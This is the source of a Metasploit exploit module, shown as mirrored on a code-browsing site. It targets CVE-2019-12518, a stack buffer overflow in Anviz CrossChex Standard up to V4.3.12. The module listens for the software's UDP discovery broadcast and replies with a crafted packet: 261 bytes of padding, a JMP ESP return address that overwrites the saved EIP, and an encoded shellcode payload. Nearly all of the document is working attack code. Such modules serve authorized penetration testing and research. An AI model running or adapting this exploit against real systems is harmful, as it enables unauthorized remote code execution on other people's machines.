Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/crosschex_device_bof.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8
  PACKET_LEN = 10

9


10
  include Msf::Exploit::Remote::Udp

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Anviz CrossChex Buffer Overflow',

17
        'Description' => %q{

18
          Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,

19
          triggering a stack buffer overflow.

20
        },

21
        'Author' => [

22
          'Luis Catarino <[email protected]>', # original discovery/exploit

23
          'Pedro Rodrigues <[email protected]>', # original discovery/exploit

24
          'agalway-r7', # Module creation

25
          'adfoster-r7' # Module creation

26
        ],

27
        'License' => MSF_LICENSE,

28
        'References' => [

29
          ['CVE', '2019-12518'],

30
          ['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],

31
          ['EDB', '47734']

32
        ],

33
        'Payload' => {

34
          'Space' => 8947,

35
          'DisableNops' => true

36
        },

37
        'Arch' => ARCH_X86,

38
        'EncoderType' => Msf::Encoder::Type::Raw,

39
        'Privileged' => true,

40
        'Platform' => 'win',

41
        'DisclosureDate' => '2019-11-28',

42
        'Targets' => [

43
          [

44
            'Crosschex Standard x86 <= V4.3.12',

45
            {

46
              'Offset' => 261, # Overwrites stack memory to allow saved EIP to be overwritten

47
              'Ret' => "\x07\x18\x42\x00", # Overwrites saved EIP with address of 'JMP ESP' assembly instruction found in CrossChex code

48
              'Shift' => 4 # Positions payload to be written at beginning of ESP

49
            }

50
          ]

51
        ],

52
        'DefaultTarget' => 0,

53
        'Notes' => {

54
          'Reliability' => UNKNOWN_RELIABILITY,

55
          'Stability' => UNKNOWN_STABILITY,

56
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

57
        }

58
      )

59
    )

60
    deregister_udp_options

61
    register_options(

62
      [

63
        Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'),

64
        Opt::CHOST('0.0.0.0', true, 'IP address that UDP Socket listens for CrossChex broadcast on. \'0.0.0.0\' is needed to receive broadcasts.'),

65
        OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100])

66
      ]

67
    )

68
  end

69


70
  def exploit

71
    connect_udp

72


73
    res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore['TIMEOUT'].to_i > 0 ? datastore['TIMEOUT'].to_i : nil)

74
    if res.empty?

75
      fail_with(Failure::TimeoutExpired, 'Module timed out waiting for CrossChex broadcast')

76
    end

77


78
    print_status 'CrossChex broadcast received, sending payload in response'

79
    sploit = rand_text_english(target['Offset'])

80
    sploit << target.ret # Overwrites saved EIP with address of 'JMP ESP' assembly instruction found in CrossChex code

81
    sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP

82
    sploit << payload.encoded

83


84
    udp_sock.sendto(sploit, host, port)

85
    print_status 'Payload sent'

86
  end

87
end

88


89